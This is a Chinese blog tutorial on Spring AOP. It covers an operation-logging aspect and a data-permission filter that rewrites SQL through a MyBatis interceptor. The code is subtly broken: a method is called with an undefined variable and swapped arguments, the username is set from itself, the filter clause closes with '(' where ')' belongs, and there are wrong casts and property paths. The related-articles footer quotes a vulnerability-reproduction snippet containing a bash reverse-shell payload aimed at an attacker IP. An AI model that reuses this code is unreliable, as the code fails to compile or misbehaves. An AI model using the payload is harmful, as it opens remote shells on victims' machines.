慢慢渗透Spring AOP概念(二) --- 代码演示

最新推荐文章于 2022-07-25 11:14:38 发布
最新推荐文章于 2022-07-25 11:14:38 发布
阅读量369 收藏
点赞数
文章标签: java aop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013355659/article/details/103762968
版权

在上一篇文章中已经将SpringAOP的有关注解以及代理模式做了一些介绍和理解,本篇文章指在为了更好在项目中使用运用切面AOP的思想

一: 操作日志

我们在项目中可能涉及保存用户的操作记录,来达到监控项目的作用,这个时候如果我们每次都把业务逻辑和对系统的操作记录都放在一个方法中就是会造成项目的臃肿。不利于维护,性能也会变得很差。所以我们可以使用我们AOP切面编程的思想来处理这个问题。
这边我们采用自定义注解+SpringAOP的方式 记录用户对系统的操作:
1: 定义日志注解

package com.hwrest.jeadmin.common.annotation;

import java.lang.annotation.*;

/**
 * @author queiter.ex
 * @title: SysLog
 * @projectName 
 * @description: 日志注解
 * @date 2019/12/309:13
 */
@Documented
@Target(ElementType.METHOD) // 该注解放在方法上
@Retention(RetentionPolicy.RUNTIME)
public @interface SysLog {

    String name() default "";
}

@Documented,@Target,@Retention 这三个元注解的代表的含义
2:定义切面处理类
切面处理类主要处理@SysLog 注解到什么方法上处理该方法的逻辑

package com.hwrest.jeadmin.common.aspect;

import com.google.gson.Gson;
import com.hwrest.jeadmin.common.annotation.SysLog;
import com.hwrest.jeadmin.common.utils.HttpContextUtils;
import com.hwrest.jeadmin.common.utils.IPUtils;
import com.hwrest.jeadmin.common.utils.ShiroUtils;
import com.hwrest.jeadmin.modules.sys.entity.SysLogEntity;
import com.hwrest.jeadmin.modules.sys.entity.SysUserEntity;
import com.hwrest.jeadmin.modules.sys.service.SysLogService;
import org.apache.shiro.subject.Subject;
import org.aspectj.lang.ProceedingJoinPoint;
import org.aspectj.lang.Signature;
import org.aspectj.lang.annotation.Around;
import org.aspectj.lang.annotation.Aspect;
import org.aspectj.lang.annotation.Pointcut;
import org.aspectj.lang.reflect.MethodSignature;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;

import javax.servlet.http.HttpServletRequest;
import java.lang.reflect.Method;
import java.util.Date;

/**
 * @author queiter.ex
 * @title: SysLogAspect
 * @projectName je_admin
 * @description: 日志切面处理类
 * @date 2019/12/309:40
 */
@Component
@Aspect
public class SysLogAspect {

    // 注入操作日志的接口
    @Autowired
    private SysLogService sysLogService;


    // 定义切点
    @Pointcut("@annotation(com.hwrest.jeadmin.common.annotation.SysLog)")
    public void logPointCut(){

    }


    // 从在项目中方法凡是有注解的地方获取方法的参数和注解注释的内容
    @Around("logPointCut()") // 环绕通知
    public Object around(ProceedingJoinPoint point) throws Throwable {
        // 执行开始的时间
        long begTime = System.currentTimeMillis();
        // 执行的方法
        Object proceed = point.proceed();
        // 执行的时间
        long time = System.currentTimeMillis() - begTime;
        // 保存日志
        saveLog(point, time);
        return proceed;
    }
     /**
      * @Author liuhongwei
      * @Description 保存日志的信息
      * @Date 10:05 2019/12/30
      * @param
      * @return
      */
    private void saveLog(ProceedingJoinPoint point, long time) {
        MethodSignature signature = (MethodSignature) point.getSignature();
        // 拿到 方法
        Method method = signature.getMethod();

        SysLogEntity sysLogEntity = new SysLogEntity();
        // 通过方法拿到注解的方法
        SysLog annotation = method.getAnnotation(SysLog.class);
        // 当注解存在的时候  防止空指针异常
        if (annotation != null) {
            // annotation.name() 获取注解上该方法的文字
            sysLogEntity.setOperation(annotation.name());
        }
        // 获取类的名称   全路径的名称
        String className = point.getTarget().getClass().getName();
        // 获取方法的名字
        String methodName = signature.getName();
        // 将 类名和方法名字组装一下就是方法的全路径名称
        sysLogEntity.setMethod(className + "." + methodName + "()");

        // 获取请求的参数

        Object[] args = point.getArgs();

        try {
            String params = new Gson().toJson(args);
            sysLogEntity.setParams(params);
        } catch (Exception e) {

        }
        // 获取请求的Request
        HttpServletRequest request = HttpContextUtils.getHttpServletRequest();

        // 根据 request 获取用户的ip地址
        sysLogEntity.setIp(IPUtils.getIpAddr(request));

        // 设置用户名称
        SysUserEntity sysUserEntity = (SysUserEntity) ShiroUtils.getSubject();

        sysLogEntity.setUsername(sysLogEntity.getUsername());

        // 设置时间请求的时间
        sysLogEntity.setTime(time);

        sysLogEntity.setCreateDate(new Date());
        // 保存日志
        sysLogService.save(sysLogEntity);
    }
}

SysLogEntity 实体类

package com.hwrest.jeadmin.modules.sys.entity;

import com.baomidou.mybatisplus.annotation.TableId;
import com.baomidou.mybatisplus.annotation.TableName;
import lombok.Data;

import java.io.Serializable;
import java.util.Date;

/**
 * @author queiter.ex
 * @title: SysLogEntity
 * @projectName je_admin
 * @description: TODO
 * @date 2019/12/309:43
 */
@Data
@TableName(value = "sys_log")
public class SysLogEntity implements Serializable {

    @TableId
    private Long id;
    //用户名
    private String username;
    //用户操作
    private String operation;
    //请求方法
    private String method;
    //请求参数
    private String params;
    //执行时长(毫秒)
    private Long time;
    //IP地址
    private String ip;
    //创建时间
    private Date createDate;

}

上述就是关于我们记录操作日志的代码实现,我们主要利用了自定义注解注解到哪个方法上,然后采用切面处理的方式获取被注解的方法方法名称和参数的名称。存到我们数据库的操作日志中

二:数据权限

我们在项目中,我们会涉及到数据权限问题。在数据权限上我们一般是通过sql语句进行数据的限制,假如,现在项目中有很多的模块都涉及到数据权限的问题,那么我们需要在每个模块响应的sql上加上数据权限相关的sql语句,如果这样实现的话我们就会造成在Mapper.xm中sql的语句非常多。代码看起来比较臃肿而且还不易于维护。所以我们为了简化代码,我们采用注解的方式通过切面类进行组装统一的数据权限的sql。
1:定义数据权限的注解

package com.hwrest.jeadmin.common.annotation;

import java.lang.annotation.*;

/**
 * @author quiter.ex
 * @title: DataFilter
 * @projectName je_admin
 * @description: 数据权限过滤注解
 * @date 2019/12/3014:02
 */
@Documented
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
public @interface DataFilter {

    /**
     * 表的别名
     */
    String tableAlias() default "";

    /**
     * 查询条件前缀,可选值有:[where、and]
     */
    String prefix() default "";

    /**
     * 用户ID
     */
    String userId() default "creator";

    /**
     * 部门ID
     */
    String deptId() default "dept_id";

}

2:定义切面类,获取注解定义的参数,并组装数据

package com.hwrest.jeadmin.common.aspect;

import cn.hutool.core.collection.CollUtil;
import com.hwrest.jeadmin.common.annotation.DataFilter;
import com.hwrest.jeadmin.common.enumAdmin.SuperAdminEnum;
import com.hwrest.jeadmin.common.utils.ShiroUtils;
import com.hwrest.jeadmin.modules.sys.entity.SysUserEntity;
import org.apache.commons.lang.StringUtils;
import org.aspectj.lang.JoinPoint;
import org.aspectj.lang.annotation.Aspect;
import org.aspectj.lang.annotation.Before;
import org.aspectj.lang.annotation.Pointcut;
import org.aspectj.lang.reflect.MethodSignature;
import org.springframework.stereotype.Component;

import java.util.List;
import java.util.Map;

/**
 * @author liuhongwei.ex
 * @title: DataFilterAspect
 * @projectName je_admin
 * @description: 数据权限处理类
 * @date 2019/12/3014:10
 */
@Aspect // 定义此类是一个切面处理类
@Component // 注册Bean容器当中去
public class DataFilterAspect {

    // 定义切点
    @Pointcut("@annotation(com.hwrest.jeadmin.common.annotation.DataFilter)")
    public void dataFilterCut() {

    }

    // 处理切点从注解中获取到的字段组装sql语句
    @Before("dataFilterCut()")
    public void dataFilter(JoinPoint point) {
        // 获取注解标注的方法参数是否为存在
        Object params = point.getArgs()[0];

        if (params != null && params instanceof Map) {
           SysUserEntity sysUserEntity = (SysUserEntity) ShiroUtils.getSubject();

           // 该用户是否为管理员
           if (sysUserEntity.getIsAdmin() == SuperAdminEnum.NO.value()) {
  Map map = (Map)params;
                String sqlFilter = getSqlFilter(user, point);
                map.put("sqlFilter", new DataScope(sqlFilter));
           }


        }
    }

    public String getSqlFilter(JoinPoint point, SysUserEntity sysUserEntity) {
        // 获取动态的连接点
        MethodSignature signature = (MethodSignature) point.getSignature();
        // 获取注解权限的 注解
        DataFilter annotation = signature.getMethod().getAnnotation(DataFilter.class);
        // 获取表的别名
        String tableAlias = annotation.tableAlias();
        if (StringUtils.isNotBlank(tableAlias)) {
            tableAlias += ".";
        }

        StringBuilder stringBuilder = new StringBuilder();

        // 获取查询条件的前缀
        String prefix = annotation.prefix();
        // 组装数据结构
        if (StringUtils.isNotBlank(prefix)) {
            stringBuilder.append(" ").append(prefix);
        }
        stringBuilder.append(" (");

        // 获取部门的列表
        List<Long> roleIdList = sysUserEntity.getDeptIdList();
        if (CollUtil.isNotEmpty(roleIdList)) {
            stringBuilder.append(tableAlias).append(annotation.deptId());


            stringBuilder.append(" in(").append(StringUtils.join(roleIdList, ",")).append(") ");
        }

        // 查询本人的数据
        if (CollUtil.isNotEmpty(roleIdList)) {
            stringBuilder.append(" or ");
        }

        stringBuilder.append(tableAlias).append(annotation.userId()).append(" = ").append(sysUserEntity.getUserId());

        stringBuilder.append("(");

        return stringBuilder.toString();

    }
}

3:这边因为是采用了MybatisPlus组件,所以我们可以使用拦截器(再生成sql语句的时候)拦截住sql然后重新拼装sql语句。

package com.hwrest.jeadmin.common.interceptor;

import com.baomidou.mybatisplus.core.toolkit.PluginUtils;
import com.baomidou.mybatisplus.extension.handlers.AbstractSqlParserHandler;
import com.hwrest.jeadmin.modules.sys.entity.DataScope;
import org.apache.ibatis.executor.statement.StatementHandler;
import org.apache.ibatis.mapping.BoundSql;
import org.apache.ibatis.mapping.MappedStatement;
import org.apache.ibatis.mapping.SqlCommandType;
import org.apache.ibatis.plugin.*;
import org.apache.ibatis.reflection.MetaObject;
import org.apache.ibatis.reflection.SystemMetaObject;

import java.sql.Connection;
import java.util.Map;
import java.util.Properties;

/**
 * @author quiter.ex
 * @title: DataFilterInterceptor
 * @projectName je_admin
 * @description: TODO
 * @date 2019/12/3016:04
 */
@Intercepts({@Signature(type = StatementHandler.class, method = "prepare", args = {Connection.class, Integer.class})})
public class DataFilterInterceptor extends AbstractSqlParserHandler implements Interceptor {


    @Override
    public Object intercept(Invocation invocation) throws Throwable {
        StatementHandler statementHandler = PluginUtils.realTarget(invocation.getTarget());

        MetaObject metaObject = SystemMetaObject.forObject(statementHandler);

        // 解析sql
        this.sqlParser(metaObject);

        // 判断一下是不是SELECT的操作
        MappedStatement mappedStatement = (MappedStatement) metaObject.getValue("delegate.mappedStatement");

        if (!SqlCommandType.SELECT.equals(mappedStatement.getSqlCommandType())) {
            return invocation.proceed();
        }
        //针对定义了rowBounds, 作为mapper接口方法的参数
        BoundSql boundSql = (BoundSql) metaObject.getValue("delegate.mappedStatement");
        // 拿到sql并转化成大写
        String originalSql = boundSql.getSql().toUpperCase();
        // 拿到sql的参数
        Object parameterObject = boundSql.getParameterObject();

        // 判断参数里是否有DataScope的对象
        DataScope scope = null;

        if (parameterObject instanceof DataScope) {
            scope = (DataScope) parameterObject;
        } else if (parameterObject instanceof Map) {
            for (Object args : ((Map) parameterObject).values())
                if (args instanceof DataScope) {
                    scope = (DataScope) args;
                    break;
                }
        }

        // 当不用数据过滤的时候

        if (scope == null) {
            return invocation.proceed();
        }


        // 拼接新的sql
        if (originalSql.indexOf(" ORDER BY ") != -1) {
            originalSql = originalSql.replace("ORDER BY", scope.getSqlFilter() + " ORDER BY ");
        } else {
            originalSql = originalSql + scope.getSqlFilter();
        }

        // 重写这个sql

        metaObject.setValue("delegate.boundSql.sql", originalSql);
        return invocation.proceed();
    }

    @Override
    public Object plugin(Object target) {
        if (target instanceof StatementHandler) {
            return Plugin.wrap(target, this);
        }
        return target;
    }

    @Override
    public void setProperties(Properties properties) {

    }
}

上述两个就是利用SpringAop的思想概念来简化代码的操作如有错误欢迎大家前来指正

MoreRun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开发工具 spring-aop-4.3.6.RELEASE
05-31
开发工具 spring-aop-4.3.6.RELEASE开发工具 spring-aop-4.3.6.RELEASE开发工具 spring-aop-4.3.6.RELEASE开发工具 spring-aop-4.3.6.RELEASE开发工具 spring-aop-4.3.6.RELEASE开发工具 spring-aop-4.3.6.RELEASE...
框架安全之Spring渗透
wuxiaopengnihao1的博客
08-13 725
其中Spring就是Spring Framework的缩写,Spring MVC是Spring中的一个MVC框架,用于开发Web应用和网络接口。本篇文章是Spring渗透复现记录,记录了实际中常见的Spring漏洞并如何利用,及简单对漏洞底层的原理分析,分为四个部分:Spring简介、IDEA部署Spring、Vulhub靶场环境搭建和相关漏洞复现,在学习Spring中阅读了十几篇中英文相关文章,由浅入深地学习并最终成功复现了5个漏洞,参考的文章也在文中列出。接着,开始我们的Spring渗透之路学习!...
java自定义注解
NullToSay的踩坑日常
06-04 566
一、自定义一个注解,用于实体类的属性上,可以用在参数校验等处 import java.lang.annotation.*; /** * 自定义注解 * 使用在属性上 */ @Target(ElementType.FIELD) @Retention(RetentionPolicy.RUNTIME) @Documented public @interface AttributeDesc { String notes() default "";//属性名称 boolean can
一起用注解过滤数据吧
weixin_42827159的博客
10-14 882
背景 工作中肯定用到根据某某机构去过滤数据也就是权限控制 这类数据想当然就应该用 SpringAOP 去实现 思路 首先规定用什么标志让 Spring 识别当前方法需要数据过滤 优雅的使用自定义注解是个不错的选择 注解里面传入当前要进行数据过滤的 Class 对象即可 业务实体类对象里面需要声明一份公共的 OrgIds List 格式用来存放过滤后的查询条件 自定义 DataFilter 注解 package ; import java.lang.annotation.Documented;
MybatisPlus数据权限
qq_34533703的博客
07-13 3758
数据权限设计
SpringBoot渗透总结
weixin_72753070的博客
07-25 1277
今天的文章主要跟大家聊一下关于springboot环境下的渗透Springboot现如今可以说是java开发的一个入门框架,深受各个公司亲赖,现有java站点springboot还是有一定比例的,所以说还是有必要对springboot渗透有一定了解。...
Spring5 框架 ---- AOP ---- 代码
09-12
Spring5 框架 ---- AOP ---- 代码 Spring5 框架 ---- AOP ---- 代码 Spring5 框架 ---- AOP ---- 代码 Spring5 框架 ---- AOP ---- 代码 Spring5 框架 ---- AOP ---- 代码 Spring5 框架 ---- AOP ---- 代码 Spring5 ...
spring-aop-5.3.10-API文档-中文版.zip
06-04
赠送源代码spring-aop-5.3.10-sources.jar; 赠送Maven依赖信息文件:spring-aop-5.3.10.pom; 包含翻译后的API文档:spring-aop-5.3.10-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.springframework:...
spring-aop-5.3.26.jar
04-22
spring-aop.jar 各个版本,免费下载 Spring 的面向切面编程,提供 AOP(面向切面编程)的实现。 如果下载不了,关注我,评论区联系我。
spring-aop-6.0.8.jar
最新发布
04-22
spring-aop.jar 各个版本,免费下载 Spring 的面向切面编程,提供 AOP(面向切面编程)的实现。 如果下载不了,关注我,评论区联系我。
基础巩固--aspect中的Joint类
shawnyang2019的博客
10-29 207
/** * Copyright 2018 耘林养老 http://www.crm.cn * <p> * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may...
spring boot aop @Before注解 里面多层参数
i_am_a_kid的博客
10-22 2370
```java @Aspect @Component public class PagerAop { /** * 拦截DAO执行之前的参数,并初始化分页插件 * * @param joinPoint * @throws InterruptedException */ @Before("execution(java.util.List com.weein.admin.dao.*.select*(..))" + "||.
慢慢渗透Spring AOP概念(一)
u013355659的博客
12-21 705
慢慢渗透Spring AOP概念(一) 冷静 小白书生 今天 我们在理解Spring AOP概念的时候我们首先要知道什么是面向切面编程? 1:什么是面向切面编程(AOP)呢? 在软件业,AOP为Aspect Oriented Programming的缩写,意为:面向切面编程,通过预编译方式和运行期动态代理实现程序功能的统一维护的一种技术。AOP是OOP的延续,是软件开发中的一个热点,也是Sprin...
若依如何实现数据范围过滤的
qq_45387173的博客
07-27 3113
若依如何实现数据范围过滤的 若依源码分析-----数据范围过滤 通过${params.dataScope}在需要进行数据范围过滤的地方拼接一个sql语句。 or d.dept_id in (select dept_id from sys_role_dept where role_id ={rolelist}) 我们看一下若依是如何实现的 首先在需要进行数据范围过滤的地方加上注解 @DataScope(deptAlias = “d”) 比如下面server层获取部门清单 /** * 查询部门管理数据 *
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
数据权限的处理:用AOP+自定义注解解决
qq_37578465的博客
07-12 1373
由于遇到项目中要做数据权限处理,参考网上大神所做 一、自定义注解 @Retention(RetentionPolicy.RUNTIME) //执行期 @Target(ElementType.METHOD) //作用于方法上 @Documented public @interface DataAuthc { /** * 表的别名 */ public String...
spring Filter,Interseptor,Aspect使用场景比较
qq_41319311的博客
11-05 694
学习笔记 Spring 常用拦截器 我将以记录访问EESTFul API 访问者的ip地址为例 常见的三种拦截机制是实现以下三种实现的 1.过滤器 Filter 2.拦截器 Interceptor 3.切片Aspect 先让我们写一个简单的Filter 但是还是会有一些需要使我们不得应用启动项目的组件,那如何做到这一步了 这里我不找其他的过滤器我就用我写的Filter做Demo ...
spring框架远程代码执行漏洞CVE-2017-4971复现
weixin_43736941的博客
08-28 1906
利用vulhub进行漏洞环境搭建 靶机:centos 172.16.2.182 攻击机:kali 172.16.2.173 浏览器访问172.16.2.182:8080 点击左上角登录,用给出的账号进行登录 点击确定时,burp进行抓包 使用如下反弹shell的Payload: &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vul
浅谈Spring框架的三种注入模式:
gift2015的博客
06-04 6233
1.Spring是一个轻量级的控制反转(IoC)和面向切面(AOP)的容器框架。轻量——从大小与开销两方面而言Spring都是轻量的。完整的Spring框架可以在一个大小只有1MB多的JAR文件里发布。并且Spring所需的处理开销也是微不足道的。此外,Spring是非侵入式的:典型地,Spring应用中的对象不依赖于Spring的特定类。控制反转——Spring通过一种称作控制反转(IoC)的技...
spring-aopspring-boot-starter-aop的区别
09-22
spring-aopspring-boot-starter-aop的区别在于配置的简化程度和依赖的引入方式。spring-aop是基于Spring框架的AOP实现方式,需要通过XML配置文件来定义切面和通知。而spring-boot-starter-aop是针对Spring Boot应用程序提供的一种简化配置和使用的方式,可以通过注解和Java配置来定义切面和通知。使用spring-boot-starter-aop可以更方便地进行AOP操作,并且不需要额外引入独立的AOP依赖。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值